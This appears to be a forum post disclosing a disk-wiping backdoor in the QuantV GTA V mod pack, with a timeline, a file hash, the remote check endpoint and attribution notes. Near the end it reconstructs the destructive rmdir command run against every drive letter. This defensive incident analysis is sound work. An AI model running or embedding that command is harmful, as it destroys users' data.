This topic contains a timeline and rough summary on the findings regarding the ‘QuantV’ disk wiping incident.
Context
QuantV is a third-party ‘graphics mod pack’ for GTA V, being sold on Patreon by its creator (‘Quant’). It bundles a few plugin DLLs to set shader parameters for the ENBSeries shader patching library, and help with making screenshots.
Timeline
- 2022-09-03T11:48:00Z: I was informed that there was some lore being spread regarding ‘a trojan virus with drive exterminator’ in the native DLLs bundled with QuantV.
- 2022-09-03T11:52:00Z: A buyer sent a copy of a legitimately purchased version of QuantV to me for analysis.
-
2022-09-03T12:07:00Z: Analysis started on
QuantV.asi, with a file time of 2022-09-01T12:06:34Z, a PE timestamp of 2022-08-29T21:34:35Z, and a SHA256 hash of5cfd77770ebbb279f6d998c7d000724259a6c9bb013f3a70a3940337441bf5e6. -
2022-09-03T12:14:00Z: Code that contained a list of drive letters and called
system()on some obfuscated (XOR’d) string was discovered. Investigation continued. - 2022-09-03T12:51:00Z: A tweet informing about this was posted. As the lore was already being spread, this was considered a responsible course of action.
-
2022-09-03T19:30:00Z: More investigation was performed,
enbhelper.dllwas confirmed as malicious as well, and it appears that a non-functional internet connection will ‘nullify’ the HTTP check at least. The plugin also seems to use/store a flag in some.inifile, as well as ax64\data\errorcodes\romanian.txtin the game directory being used as a trigger flag. -
2022-09-04T17:13:00Z: A newer build has been released (with file times of September 4, 2022, and a few days newer PE timestamp) which does not include the malicious code in
QuantV.asi, though it still is included inenbhelper.dll. Regrettably, the author denies having been involved in this, instead going with FUD explanations, looking like a cover-up operation. Notably, however, both versions very much look built from the same source code, and the server checks using the same XOR string library are still in.
Factual information
-
OnlyQuantV.asiis affected.enbfeeder.asiandenbhelper.dllseem unimpacted.OnlyBothQuantV.asihas the HTTP code to fetch status, butenbhelper.dllwill apply a pending ‘disk wipe’ as well.enbhelper.dllandQuantV.asicontain the full disk wipe/HTTP check logic. This wasn’t found initially as compiler settings were different. - It’s unlikely that this was added by a ‘leaker’ as some rumors say. The way this is integrated into the code shows that this was likely done by someone with access to either original or reverse-engineered source code for the .asi file, and the chain I’ve received the sample from corroborates this.
- Antivirus software generally does not pick this up as they rely on a) known signatures or b) behavioral analysis. Since this is a plugin, preemptive behavioral analysis does not apply.
- There is no sign of this version of the .asi executing any other commands than this
rmdirchain. - Similarly, there’s no sign of other persistence methods, though there are some file read/writes, and it may be the case the .asi will edit some
.inifiles in theenbseriesfolder to ‘worm’ in case a pirated copy is spread further. - The ‘check’ is done using a HTTP API,
the details of which have not been investigated at this timelocated athttp://quantv.xyz/updater, presumable with a POST request ofcode=..., involving theDesaturate Radius=value inenbseries/enbeffect.fx.ini, which is actually a unique user ID.
The library cpp-httplib is used, withhttplib::renamed toenb::. The main ‘trigger’ is this API returning (or not returning)true. - The command executed amounts to
system(("rmdir /s /q " + drive_letter).c_str());. This will remove files that the user has access to read/write, which could be a lot. - There have been reports of this being used in the wild, and this existing in pirated copies of an ‘August release’ as well.